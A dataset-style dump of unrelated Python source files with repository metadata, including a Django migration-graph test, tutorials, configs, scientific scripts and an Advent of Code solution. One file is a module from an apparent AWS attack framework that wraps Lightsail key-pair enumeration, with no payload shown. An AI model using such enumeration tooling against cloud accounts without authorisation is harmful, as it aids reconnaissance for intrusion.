def test_iter_batches(self):
"""Testing EvolutionGraph.iter_batches"""
evolutions_app = get_app('evolutions_app')
evolutions_app2 = get_app('evolutions_app2')
evolution_deps_app = get_app('evolution_deps_app')
# evolutions_app
evolutions1 = [
Evolution(app_label='evolutions_app',
label='first_evolution'),
Evolution(app_label='evolutions_app',
label='second_evolution'),
]
models1 = [EvolutionsAppTestModel]
# evolutions_app2
evolutions2 = [
Evolution(app_label='evolutions_app2',
label='first_evolution'),
Evolution(app_label='evolutions_app2',
label='second_evolution'),
]
models2 = [EvolutionsApp2TestModel]
# evolution_deps_app
evolutions3 = [
Evolution(app_label='evolution_deps_app',
label='test_evolution'),
]
graph = EvolutionGraph()
graph.process_migration_deps = supports_migrations
if supports_migrations:
connection = connections[DEFAULT_DB_ALIAS]
migration_executor = MigrationExecutor(connection=connection)
migration_loader = MigrationLoader(connection=connection)
migration_plan = migration_executor.migration_plan([
('migrations_app', '0002_add_field'),
('migrations_app2', '0002_add_field'),
])
migration_loader.build_graph()
graph.add_migration_plan(migration_plan=migration_plan,
migration_graph=migration_loader.graph)
else:
migration_plan = None
graph.add_evolutions(app=evolutions_app,
evolutions=evolutions1,
new_models=models1)
graph.add_evolutions(app=evolutions_app2,
evolutions=evolutions2,
new_models=models2)
graph.add_evolutions(app=evolution_deps_app,
evolutions=evolutions3)
graph.finalize()
all_batches = list(graph.iter_batches())
if supports_migrations:
self.assertEqual(len(all_batches), 6)
excluded_migration_deps = set()
else:
self.assertEqual(len(all_batches), 4)
excluded_migration_deps = {
'migration:migrations_app:0001_initial',
'migration:migrations_app2:0002_add_field',
}
# Turn this back into a generator so we can more easily check these
# batches with/without migrations, depending on the version of Django
# the tests are being run on.
batches = iter(all_batches)
# Check the first migrations batch.
if supports_migrations:
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
key='migration:migrations_app:0001_initial',
required_by={
'evolution:evolution_deps_app:test_evolution',
'migration:migrations_app:0002_add_field',
},
state={
'migration_plan_item': migration_plan[0],
'migration_target': ('migrations_app', '0001_initial'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[1],
key='migration:migrations_app:0002_add_field',
dependencies={
'migration:migrations_app:0001_initial',
},
required_by={
'migration:migrations_app2:0001_initial',
},
state={
'migration_plan_item': migration_plan[1],
'migration_target': ('migrations_app', '0002_add_field'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
self._check_node(
nodes[2],
key='migration:migrations_app2:0001_initial',
dependencies={
'migration:migrations_app:0002_add_field',
},
required_by={
'migration:migrations_app2:0002_add_field',
},
state={
'migration_plan_item': migration_plan[2],
'migration_target': ('migrations_app2', '0001_initial'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
# Check the first create-model batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='create-model:evolutions_app:evolutionsapptestmodel',
dependencies={
'evolution:evolutions_app:__first__',
},
required_by={
'evolution:evolutions_app:first_evolution',
},
state={
'app': evolutions_app,
'model': EvolutionsAppTestModel,
'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
})
# Check the first evolution batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
self.assertEqual(len(nodes), 3)
self._check_node(
nodes[0],
key='evolution:evolutions_app:first_evolution',
dependencies={
'create-model:evolutions_app:evolutionsapptestmodel',
},
required_by={
'evolution:evolution_deps_app:test_evolution',
'evolution:evolutions_app:second_evolution',
},
state={
'app': evolutions_app,
'evolution': evolutions1[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[1],
key='evolution:evolutions_app:second_evolution',
dependencies={
'evolution:evolutions_app:first_evolution',
},
required_by={
'evolution:evolutions_app:__last__',
},
state={
'app': evolutions_app,
'evolution': evolutions1[1],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[2],
key='evolution:evolution_deps_app:test_evolution',
dependencies={
'evolution:evolution_deps_app:__first__',
'evolution:evolutions_app:first_evolution',
'evolution:evolutions_app:__last__',
'migration:migrations_app:0001_initial',
} - excluded_migration_deps,
required_by={
'evolution:evolution_deps_app:__last__',
'evolution:evolutions_app2:__first__',
'evolution:evolutions_app2:second_evolution',
'migration:migrations_app2:0002_add_field',
} - excluded_migration_deps,
state={
'app': evolution_deps_app,
'evolution': evolutions3[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
if supports_migrations:
# Check the second migration batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_MIGRATION)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='migration:migrations_app2:0002_add_field',
dependencies={
'evolution:evolution_deps_app:test_evolution',
'migration:migrations_app2:0001_initial',
},
state={
'migration_plan_item': migration_plan[3],
'migration_target': ('migrations_app2', '0002_add_field'),
'type': EvolutionGraph.NODE_TYPE_MIGRATION,
})
# Check the second create-model batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_CREATE_MODEL)
self.assertEqual(len(nodes), 1)
self._check_node(
nodes[0],
key='create-model:evolutions_app2:evolutionsapp2testmodel',
dependencies={
'evolution:evolutions_app2:__first__',
},
required_by={
'evolution:evolutions_app2:first_evolution',
},
state={
'app': evolutions_app2,
'model': EvolutionsApp2TestModel,
'type': EvolutionGraph.NODE_TYPE_CREATE_MODEL,
})
# Check the second evolution batch.
node_type, nodes = next(batches)
self.assertEqual(node_type, EvolutionGraph.NODE_TYPE_EVOLUTION)
self.assertEqual(len(nodes), 2)
self._check_node(
nodes[0],
key='evolution:evolutions_app2:first_evolution',
dependencies={
'create-model:evolutions_app2:evolutionsapp2testmodel',
},
required_by={
'evolution:evolutions_app2:second_evolution',
},
state={
'app': evolutions_app2,
'evolution': evolutions2[0],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
self._check_node(
nodes[1],
key='evolution:evolutions_app2:second_evolution',
dependencies={
'evolution:evolution_deps_app:test_evolution',
'evolution:evolutions_app2:first_evolution',
},
required_by={
'evolution:evolutions_app2:__last__',
},
state={
'app': evolutions_app2,
'evolution': evolutions2[1],
'type': EvolutionGraph.NODE_TYPE_EVOLUTION,
})
def _add_migrations(self, graph, migrations_info, leaf_migration_targets,
mark_applied=[]):
"""Add migrations to a graph.
This is a utility for simplifying the additions of a list of
migrations to a graph, handling the creation of the Django migration
objects, the formulation of a migration plan, and the recording of
applied migrations.
Args:
graph (django_evolution.utils.graph.EvolutionGraph):
The graph to add migrations to.
migrations_info (list of tuple):
The list of info on migrations to add. Each tuple contains:
1. The app label
2. The migration name
3. The migration class
leaf_migration_targets (list of tuple):
The list of final migration targets to migrate to.
mark_applied (list of tuple, optional):
The list of migration targets to mark as applied.
Returns:
list of tuple:
The migration plan generated from the migrations.
"""
migration_list = MigrationList()
for app_label, name, migration_cls in migrations_info:
migration_list.add_migration_info(
app_label=app_label,
name=name,
migration=migration_cls(name, app_label))
connection = connections[DEFAULT_DB_ALIAS]
if mark_applied:
mark_applied_list = MigrationList()
mark_applied_list.add_migration_targets(mark_applied)
record_applied_migrations(connection, mark_applied_list)
else:
mark_applied_list = None
migration_executor = MigrationExecutor(
connection=connection,
custom_migrations=migration_list)
migration_loader = MigrationLoader(
connection=connection,
custom_migrations=migration_list)
migration_plan = \
migration_executor.migration_plan(leaf_migration_targets)
migration_loader.build_graph()
graph.add_migration_plan(migration_plan=migration_plan,
migration_graph=migration_loader.graph)
if mark_applied_list:
graph.mark_migrations_applied(mark_applied_list)
return migration_plan
def _check_node(self, node, key, insert_index=None, dependencies=set(),
required_by=set(), state={}):
"""Check a graph node for validity.
This will assert if any of the provided arguments don't match the
node.
Args:
node (django_evolution.utils.graph.Node):
The graph node to check.
key (unicode):
The expected node key.
insert_index (int, optional):
The expected insert index. If not provided, this won't be
checked.
dependencies (set, optional):
The node keys expected as dependencies.
required_by (set, optional):
The node keys expected to require this node.
state (dict, optional):
The expected state of the node.
Raises:
AssertionError:
The node did not match the expected arguments.
"""
self.assertEqual(node.key, key)
self.assertEqual(node.state, state)
self.assertEqual({_node.key for _node in node.dependencies},
dependencies)
self.assertEqual({_node.key for _node in node.required_by},
required_by)
if insert_index is not None:
self.assertEqual(node.insert_index, insert_index)
| [
"[email protected]"
] | |
2e43ad66add5cc370ee3dc18b1754c8d45d8b1fe | 31eaed64b0caeda5c5fe3603609402034e6eb7be | /ignorancia_zero/iz_aula-064 - programação orientada a objetos.py | e7aa8a74376c2e9fbd0ede1bee421dec1ba61654 | [] | no_license | RaphaelfsOliveira/workspace_python | 93657b581043176ecffb5783de208c0a00924832 | 90959697687b9398cc48146461750942802933b3 | refs/heads/master | 2021-01-11T17:39:49.574875 | 2017-06-28T20:55:43 | 2017-06-28T20:55:43 | 79,814,783 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,418 | py | # metodo especial construtor de objeto
# instantiates the object
'__init__'
# returns the object in dictionary form
'__dict__'
# converts the object to a string; it must always return a string
'__str__'
# performs operations with another instance of the object, only via the + - / * operators
'__add__'
# prints the documentation written in the instantiated object's class
'__doc__'
class Conta(object):
    '''The Conta object represents a bank account'''
def __init__(self, ID, saldo):
        '''object constructor method'''
self.ID = ID
self.saldo = saldo
def __str__(self):
        '''converts the object to a string'''
return 'ID: %d\nSaldo R$: %.2f' %(self.ID, self.saldo)
def __add__(self, outro):
        '''performs operations with another instance of the object, only via the + - / * operators'''
self.saldo += outro.saldo
def __call__(self, x):
        '''makes the object callable so it can perform some operation'''
return x
bra = Conta(123, 5000)
ita = Conta(456, 8000)
print(bra.__dict__, '__dict__ returns the object as a dictionary')
print(bra.__doc__, '__doc__ documentation of the object class')
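# Small usage sketch of the remaining dunders (added for illustration):
bra + ita       # __add__ mutates bra.saldo in place (5000 + 8000) and returns None
print(bra)      # __str__ -> "ID: 123\nSaldo R$: 13000.00"
print(bra(42))  # __call__ simply echoes its argument -> 42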
'''
>>> class Pai:
pass
>>> class Filho(Pai):
pass
>>> class Neto(Filho):
pass
>>> issubclass(Pai, Filho)
False
>>> issubclass(Filho, Pai)
True
>>> Filho.__bases__
(<class '__main__.Pai'>,)
>>> Neto.__bases__
(<class '__main__.Filho'>,)
'''
| [
"[email protected]"
] | |
bfb960beefa750bcc845e2efc49507af9740647a | 52a61caff0aeb434c32e5657e38762643e9f57dd | /DataStructuresAndAlgorithms/SearchAndSort/Search/BinarySearch/functionBinarySearch.py | 6a7e15608caca8460acd2988b9f9a53c5f770492 | [] | no_license | AndrewErmakov/PythonTrainingBasics | 1480a6378d1ec59884760e2b3014ccc3d28f058f | 639e15bbfc54da762cb9e366497754cfece30691 | refs/heads/master | 2021-06-10T15:57:58.682335 | 2021-03-25T13:37:30 | 2021-03-25T13:37:30 | 153,678,760 | 0 | 0 | null | 2018-10-30T13:52:51 | 2018-10-18T19:45:47 | Python | UTF-8 | Python | false | false | 596 | py | def binary_search(list_num: list, number: int) -> int:
"""Выводит индекс значения, которое мы ищем, иначе выводится НЕ НАЙДЕНО"""
low_border = 0
high_border = len(list_num) - 1
while low_border <= high_border:
mid = low_border + (high_border - low_border) // 2
guess = list_num[mid]
if guess == number:
return mid
if guess > number:
high_border = mid - 1
else:
low_border = mid + 1
return None
print(binary_search([1, 3, 5, 7, 9], 3))
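# -> 1 (the value 3 sits at index 1; binary search requires a sorted list)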
| [
"[email protected]"
] | |
06b82317f341de041aa076425ac0ea6a0b157357 | fdb9b553a23647f7ea06f690613707c40b54902f | /src/main/resources/resource/LocalSpeech/LocalSpeech.py | 3c699a5680887399d9993fd401bcfa08d5ebce64 | [
"CC-BY-2.5",
"Apache-2.0"
] | permissive | ShaunHolt/myrobotlab | d8d9f94e90457474cf363d36f4a45d396cfae900 | 92046d77abd560f0203050b3cccb21aa9df467f2 | refs/heads/develop | 2021-07-08T04:55:01.462116 | 2020-04-18T19:58:17 | 2020-04-18T19:58:17 | 122,795,957 | 0 | 0 | Apache-2.0 | 2020-04-18T19:58:18 | 2018-02-25T01:37:54 | Java | UTF-8 | Python | false | false | 886 | py | #########################################
# LocalSpeech.py
# description: used as a general template
# categories: speech
# more info @: http://myrobotlab.org/service/LocalSpeech
#########################################
# start the service
mouth = Runtime.start('mouth','LocalSpeech')
#possible voices ( selected voice is stored inside config until you change it )
print ("these are the voices I can have", mouth.getVoices())
print ("this is the voice I am using", mouth.getVoice())
# ( macOs )
# set your voice from macos control panel
# you can test it using say command from terminal
# mouth.setVoice("Microsoft Zira Desktop - English (United States)")
mouth.speakBlocking(u"Hello this is an english voice")
mouth.speakBlocking(u"Bonjour ceci est une voix française, je teste les accents aussi avec le mot éléphant")
mouth.setVolume(0.7)
mouth.speakBlocking("Silent please") | [
"[email protected]"
] | |
474938eddcd278b842c02f4bc13beab9969ae5d4 | cbf448f9fa287b38a6b175040141e9ee445cfcd1 | /DNN_3L/evaluation_matrics.py | cbb95bef1984a401aac76d2f267d039a67d8c78a | [] | no_license | rnaimehaom/SST-Result | 271c115d6ab1f14265169d98f604d4a63c71184e | 829029b060010b2928032b3d6728c660b538b5cf | refs/heads/main | 2023-03-27T23:17:53.935109 | 2021-04-09T02:49:58 | 2021-04-09T02:49:58 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,284 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Nov 2 15:39:34 2020
@author: tanzheng
"""
import pickle
import numpy as np
with open('DNN_3L_SST_predict.pkl', 'rb') as f:
MT_predict_result = pickle.load(f)
f.close()
first_pred_out_y, second_pred_out_y, out_prop_y, tasks = MT_predict_result
No_samples = out_prop_y.shape[0]
np_fir_pred_out_y = np.empty(shape=(No_samples, 0))
np_sec_pred_out_y = np.empty(shape=(No_samples, 0))
for i in range(len(first_pred_out_y)):
np_fir_pred_out_y = np.hstack((np_fir_pred_out_y, first_pred_out_y[i]))
np_sec_pred_out_y = np.hstack((np_sec_pred_out_y, second_pred_out_y[i]))
# target RRMSE
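# RRMSE per column: sqrt( sum((y - y_hat)^2) / sum((y - mean(y))^2) ),
# i.e. the RMSE normalised by the error of always predicting the mean.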
# single target
single_task_RRMSE = []
for i in range(len(tasks)):
temp_ST_RRMSE = sum(np.square(out_prop_y[:,i]-np_fir_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_ST_RRMSE = np.sqrt(temp_ST_RRMSE)
single_task_RRMSE.append(temp_ST_RRMSE)
# multi target
multi_task_RRMSE = []
for i in range(len(tasks)):
temp_MT_RRMSE = sum(np.square(out_prop_y[:,i]-np_sec_pred_out_y[:,i])) / sum(np.square(out_prop_y[:,i]-np.mean(out_prop_y[:,i])))
temp_MT_RRMSE = np.sqrt(temp_MT_RRMSE)
multi_task_RRMSE.append(temp_MT_RRMSE)
| [
"[email protected]"
] | |
ef5cfcba95a6606c5510682302bc8b7563f002b6 | e90bf4b372da78ceec15282d060b48d18ba8d4e9 | /supervisor/backups/const.py | c4b5e593e438d1e447c34ebcb2e8cc63ca5d919e | [
"Apache-2.0"
] | permissive | home-assistant/supervisor | 67f2e1755ff5fbf7cf2084351e1c32c6995274e0 | 4838b280adafed0997f32e021274b531178386cd | refs/heads/main | 2023-08-31T22:51:25.949277 | 2023-08-31T08:01:42 | 2023-08-31T08:01:42 | 84,926,758 | 928 | 477 | Apache-2.0 | 2023-09-14T17:11:27 | 2017-03-14T08:54:15 | Python | UTF-8 | Python | false | false | 945 | py | """Backup consts."""
from enum import StrEnum
BUF_SIZE = 2**20 * 4 # 4MB
class BackupType(StrEnum):
"""Backup type enum."""
FULL = "full"
PARTIAL = "partial"
class BackupJobStage(StrEnum):
"""Backup job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
DOCKER_CONFIG = "docker_config"
FINISHING_FILE = "finishing_file"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
class RestoreJobStage(StrEnum):
"""Restore job stage enum."""
ADDON_REPOSITORIES = "addon_repositories"
ADDONS = "addons"
AWAIT_ADDON_RESTARTS = "await_addon_restarts"
AWAIT_HOME_ASSISTANT_RESTART = "await_home_assistant_restart"
CHECK_HOME_ASSISTANT = "check_home_assistant"
DOCKER_CONFIG = "docker_config"
FOLDERS = "folders"
HOME_ASSISTANT = "home_assistant"
REMOVE_DELTA_ADDONS = "remove_delta_addons"
| [
"[email protected]"
] | |
c553d74eaa132d25fe4fc5ed0e0a10d05a9ff9e5 | f2a55f94783fed2a53bc2ff1a0096cfdb75dc5a3 | /3rd Year Diatomic Simulation Exercise/Particle1D.py | 9b7e688d4446b103fb241661e708022f216dd910 | [] | no_license | callous4567/UoE-Projects | c7b307878ae1d6b7e00227bb1a681aec2ad55b1f | 5a4ee803f70f7da9d860f905114a71278c7f50e7 | refs/heads/master | 2023-02-18T22:19:25.496429 | 2023-02-13T01:00:19 | 2023-02-13T01:00:19 | 245,646,389 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,034 | py | """
CMod Ex2: Particle1D, a class to describe 1D particles
"""
class Particle1D(object):
"""
Class to describe 1D particles.
Properties:
position(float) - position along the x axis
velocity(float) - velocity along the x axis
mass(float) - particle mass
Methods:
* formatted output
* kinetic energy
* first-order velocity update
* first- and second order position updates
"""
def __init__(self, pos, vel, mass):
"""
Initialise a Particle1D instance
:param pos: position as float
:param vel: velocity as float
:param mass: mass as float
"""
self.position = pos
self.velocity = vel
self.mass = mass
def __str__(self):
"""
Define output format.
For particle p=(2.0, 0.5, 1.0) this will print as
"x = 2.0, v = 0.5, m = 1.0"
"""
return "x = " + str(self.position) + ", v = " + str(self.velocity) + ", m = " + str(self.mass)
def kinetic_energy(self):
"""
Return kinetic energy as
1/2*mass*vel^2
"""
return 0.5*self.mass*self.velocity**2
# Time integration methods
def leap_velocity(self, dt, force):
"""
First-order velocity update,
        v(t+dt) = v(t) + dt*F(t)/m
:param dt: timestep as float
:param force: force on particle as float
"""
self.velocity += dt*force/self.mass
def leap_pos1st(self, dt):
"""
First-order position update,
x(t+dt) = x(t) + dt*v(t)
:param dt: timestep as float
"""
self.position += dt*self.velocity
def leap_pos2nd(self, dt, force):
"""
Second-order position update,
        x(t+dt) = x(t) + dt*v(t) + 1/2*dt^2*F(t)/m
:param dt: timestep as float
:param force: current force as float
"""
self.position += dt*self.velocity + 0.5*dt**2*force/self.mass
hey = Particle1D(2.0, 0.5, 1.0)  # example values taken from the __str__ docstring
print(hey.position)
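# One example integration step using the update methods above (illustrative
# values; a real integrator would recompute the force between the two calls):
force = -1.0
hey.leap_pos2nd(0.1, force)    # x <- x + dt*v + dt^2*F/(2m)
hey.leap_velocity(0.1, force)  # v <- v + dt*F/m
print(hey)                     # formatted via __str__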
| [
"[email protected]"
] | |
d2797398c8da6c4fb49aafc3d736a1391d150f12 | b6f0b3932f8cdee542f3f1fe7f5c27c67e5d1c2d | /conf/train_conf_dense_7.py | 1c88e9db0a9644002cbed124c0e05c35b5d75b9d | [] | no_license | fuding/codes_for_sicheng | dcab85b66d9f3a0f0c78c5e471223d919a3d14f7 | c8ba21572921ba0aa9686174305ab48fa614cd5d | refs/heads/master | 2022-02-26T16:32:01.253870 | 2019-10-11T06:10:27 | 2019-10-11T06:10:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,453 | py | from easydict import EasyDict
def get_config():
conf = EasyDict()
conf.arch = "dense_7"
conf.model = "MultiHDR"
conf.model_name = conf.arch + ""
conf.use_cpu = False
conf.is_train = True
conf.gpu_ids = [0]
conf.epoch = 400
conf.start_epoch = 0
conf.learning_rate = 0.0002
conf.beta1 = 0.5
conf.loss = 'l2' # l1 or l2
conf.lr_scheme = "MultiStepLR"
conf.lr_steps = [100 * 2387]
conf.lr_gamma = 0.1
conf.dataset_dir = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/"
conf.exp_path = "/home/sicheng/data/hdr/multi_ldr_hdr_patch/exp.json"
conf.dataset_name = 'Multi_LDR_HDR'
conf.batch_size = 8
conf.load_size = 256
conf.fine_size = 256
conf.c_dim = 3
conf.num_shots = 3
conf.n_workers = 4
conf.use_shuffle = True
conf.use_tb_logger = True
conf.experiments_dir = "../../experiments/" + conf.model_name
conf.log_dir = "../../tb_logger/" + conf.model_name
conf.save_freq = 2000
conf.print_freq = 200
# conf.resume_step = 78000
# conf.pretrained = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/models/' + str(
# conf.resume_step) + '_G.pth'
# conf.resume = '/home/sicheng/program/High_Dynamic_Range/BasicHDR/experiments/' + conf.model_name + '/training_state/' + str(
# conf.resume_step) + '.state'
conf.pretrained = None
conf.resume = None
return conf | [
"[email protected]"
] | |
c3025edb9e0a4bfafad31ec4def223cfdd8a6809 | 3cc2f47de6d78d610a2887f92bfba150b2994888 | /application/forms/account.py | b709a49955ab50546f45efab620eda042081cd50 | [] | no_license | fengliu222/blogbar | c8a66df586187d0a16063e4536e76d155863fe17 | ff6e7182f000777112101eed12ae9e2ca4298d25 | refs/heads/master | 2021-01-15T08:59:51.478354 | 2014-12-20T08:13:53 | 2014-12-20T08:13:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,142 | py | # coding: utf-8
from flask_wtf import Form
from wtforms import StringField, PasswordField
from wtforms.validators import DataRequired, Email
from ..models import User
class SigninForm(Form):
"""Form for signin"""
email = StringField('邮箱',
validators=[
DataRequired(),
Email()
],
description='Email')
password = PasswordField('密码',
validators=[DataRequired()],
description='Password')
def validate_email(self, field):
user = User.query.filter(User.email == self.email.data).first()
if not user:
raise ValueError("Account doesn't exist.")
def validate_password(self, field):
if self.email.data:
user = User.query.filter(User.email == self.email.data,
User.password == self.password.data).first()
if not user:
raise ValueError('Password cannot match the Email.')
else:
self.user = user | [
"[email protected]"
] | |
8d3c1b8bce69b57d0d51802846a66c1e439b70e4 | ca4faa1c6d4d87d1702b2c42a64ea6a063d71de9 | /q2_micom/_transform.py | bc96be1fc23acd5496509e2495ad09d70dc7cd8b | [
"Apache-2.0"
] | permissive | Gibbons-Lab/q2-micom | cb0ed1185a50248eae94a415e03443dbacfa8bfb | 2d954d4f584675c29aa2eccb5245e4469f1740b6 | refs/heads/master | 2020-12-07T08:48:10.020690 | 2020-01-07T23:27:39 | 2020-01-07T23:27:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,558 | py | """Transformers for MICOM types."""
import pandas as pd
from q2_micom.plugin_setup import plugin
import q2_micom._formats_and_types as ft
@plugin.register_transformer
def _1(data: pd.DataFrame) -> ft.MicomMediumFile:
mm = ft.MicomMediumFile()
data.to_csv(str(mm), index=False)
return mm
@plugin.register_transformer
def _2(mm: ft.MicomMediumFile) -> pd.DataFrame:
return pd.read_csv(str(mm), index_col=False)
@plugin.register_transformer
def _3(data: pd.DataFrame) -> ft.ModelManifest:
    sbm = ft.ModelManifest()  # matches the ModelManifest return annotation above
data.to_csv(str(sbm), index=False)
return sbm
@plugin.register_transformer
def _4(sbm: ft.ModelManifest) -> pd.DataFrame:
return pd.read_csv(str(sbm), index_col=False)
@plugin.register_transformer
def _5(data: pd.DataFrame) -> ft.CommunityModelManifest:
cmm = ft.CommunityModelManifest()
data.to_csv(str(cmm), index=False)
return cmm
@plugin.register_transformer
def _6(cmm: ft.CommunityModelManifest) -> pd.DataFrame:
return pd.read_csv(str(cmm), index_col=False)
@plugin.register_transformer
def _7(data: pd.DataFrame) -> ft.GrowthRates:
gr = ft.GrowthRates()
data.to_csv(str(gr), index=False)
return gr
@plugin.register_transformer
def _8(gr: ft.GrowthRates) -> pd.DataFrame:
return pd.read_csv(str(gr), index_col=False)
@plugin.register_transformer
def _9(data: pd.DataFrame) -> ft.Fluxes:
ef = ft.Fluxes()
data.to_parquet(str(ef))
return ef
@plugin.register_transformer
def _10(ef: ft.Fluxes) -> pd.DataFrame:
return pd.read_parquet(str(ef))
| [
"[email protected]"
] | |
3f3fb632bea88ffa2e488c584544669d6e396c19 | f7328c45c872b69c3b7c2a2bf563257f51e5fbff | /src/sound.py | 02015b9b715fb2938284ce88bb0d22e84a8a2496 | [
"MIT"
] | permissive | whoji/banjiu_2048 | ffc45ff9e0b65cccea2b3cc6e91b233db9f7ae79 | d99522f2f0f6d159b5ecb49d023ee06da5f0f5a5 | refs/heads/master | 2020-04-21T04:01:06.870805 | 2019-02-10T09:09:31 | 2019-02-10T09:09:31 | 169,301,201 | 0 | 0 | null | 2019-02-07T03:58:40 | 2019-02-05T19:42:21 | Python | UTF-8 | Python | false | false | 2,088 | py | import pygame
from flags import F
class SoundPlayer(object):
"""docstring for SoundPlayer"""
def __init__(self, pygame):
self.pygame = pygame
self.__load_sound()
self.is_playing = False
def __load_sound(self):
self.sounds = {
'move' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_1.wav'),
'merge' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_2.wav'),
'castle' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Coin_3.wav'),
'main_menu' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/sfx_sounds_powerup2.wav'),
'game_over' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
'game_finish' : self.pygame.mixer.Sound(F.proj_path + 'asset/sound/Explosion_1.wav'),
}
self.sounds['move'].set_volume(0.3)
self.sounds['main_menu'].set_volume(0.5)
self.sounds['game_over'].set_volume(0.3)
self.sounds['game_finish'].set_volume(0.3)
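    # game_status codes handled below are inferred from the sounds they
    # trigger (an assumption, not documented here): 1 = main menu,
    # 4 = game over, 6 = game finished; anything else is in-game.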
def play_sound_effect(self, event, game_status):
if game_status == 1: # main menu
if not self.is_playing:
self.sounds['main_menu'].play()
self.is_playing = True
return
elif game_status == 4:
if not self.is_playing:
self.sounds['game_over'].play()
self.is_playing = True
return
elif game_status == 6:
if not self.is_playing:
self.sounds['game_finish'].play()
self.is_playing = True
return
else:
if event[2]: # upgrade
self.sounds['castle'].play()
return
if event[3]: # cancelled_list is not empty
self.sounds['castle'].play()
return
#elif event[1]:
# self.sounds['merge'].play()
#elif event[0]:
# self.sounds['move'].play()
def play_action_sound(self):
self.sounds['move'].play()
| [
"[email protected]"
] | |
a76b4bd5db57d7d3f6e4f183973cdbe0b2485ff0 | 700c7801958dd4789caf94785b5dc8c5e3daa4fd | /ttp/lightsail_enum_keypairs.py | b60a67c5e6315a9d9da0f5817af2698ca230cd17 | [
"Apache-2.0",
"BSD-3-Clause"
] | permissive | blackbotsecurity/AWS-Attack | 24d4cd6ebda067e9672f4f963d414a7b176e3551 | ad4668ab60173aabce3c6b9c7685160be5e3f14d | refs/heads/master | 2023-03-14T00:05:54.965341 | 2021-03-05T12:44:27 | 2021-03-05T12:44:27 | 331,603,794 | 14 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,612 | py | #!/usr/bin/env python3
import datetime
#'description': "This module examines Lightsail data fields and automatically enumerates them for all available regions. Available fields can be passed upon execution to only look at certain types of data. By default, all Lightsail fields will be captured.",
import argparse
from botocore.exceptions import ClientError
import importlib
target = ''
technique_info = {
'blackbot_id': 'T1526.b.001',
'external_id': '',
'controller': 'lightsail_enum_keypairs',
'services': ['Lightsail'],
'external_dependencies': [],
'arguments_to_autocomplete': [],
'version': '1',
'aws_namespaces': [],
'last_updated_by': 'Blackbot, Inc. Sun Sep 20 04:13:33 UTC 2020' ,
'ttp_exec': '',
'ttp_mitigation': '',
'ttp_detection': '',
'intent': 'Captures common data associated with Lightsail',
'name': 'Cloud Service Discovery: Lightsail' ,
}
parser = argparse.ArgumentParser(add_help=False, description=technique_info['name'])
def main(args, awsattack_main):
args = parser.parse_args(args)
import_path = 'ttp.src.lightsail_enum_keypairs_src'
src_code = __import__(import_path, globals(), locals(), ['technique_info'], 0)
importlib.reload(src_code)
awsattack_main.chain = True
return src_code.main(args, awsattack_main)
def summary(data, awsattack_main):
out = ' Regions Enumerated:\n'
for region in data['regions']:
out += ' {}\n'.format(region)
del data['regions']
for field in data:
out += ' {} {} enumerated\n'.format(data[field], field[:-1] + '(s)')
return out
| [
"[email protected]"
] | |
1a7bacfc9808852cf7b990a159af019328d3deb0 | 9c0f691393abbeb5754e1624e0c48dfcdf857352 | /2017/Helpers/day_06.py | b8fc0de773effcccfda5ee364b548908e7b0101b | [] | no_license | seligman/aoc | d0aac62eda3e6adc3c96229ca859bd2274398187 | 9de27ff2e13100770a3afa4595b15565d45bb6bc | refs/heads/master | 2023-04-02T16:45:19.032567 | 2023-03-22T15:05:33 | 2023-03-22T15:05:33 | 230,493,583 | 17 | 10 | null | null | null | null | UTF-8 | Python | false | false | 1,540 | py | #!/usr/bin/env python3
DAY_NUM = 6
DAY_DESC = 'Day 6: Memory Reallocation'
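# calc() repeatedly redistributes the fullest bank and counts states until a
# repeat; with redo=1 the 'seen' set is cleared at the first repeat, so the
# run until the *second* repeat measures the cycle length (part 2).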
def calc(log, values, redo):
banks = [int(x) for x in values[0].replace("\t", " ").split(" ")]
seen = set()
while True:
key = tuple(banks)
if key in seen:
if redo == 0:
break
else:
seen = set()
redo -= 1
seen.add(key)
i = banks.index(max(banks))
val = banks[i]
banks[i] = 0
for x in range(val):
banks[(i + 1 + x) % len(banks)] += 1
return len(seen)
def test(log):
values = [
"0 2 7 0",
]
if calc(log, values, 0) == 5:
if calc(log, values, 1) == 4:
return True
else:
return False
else:
return False
def run(log, values):
log(calc(log, values, 0))
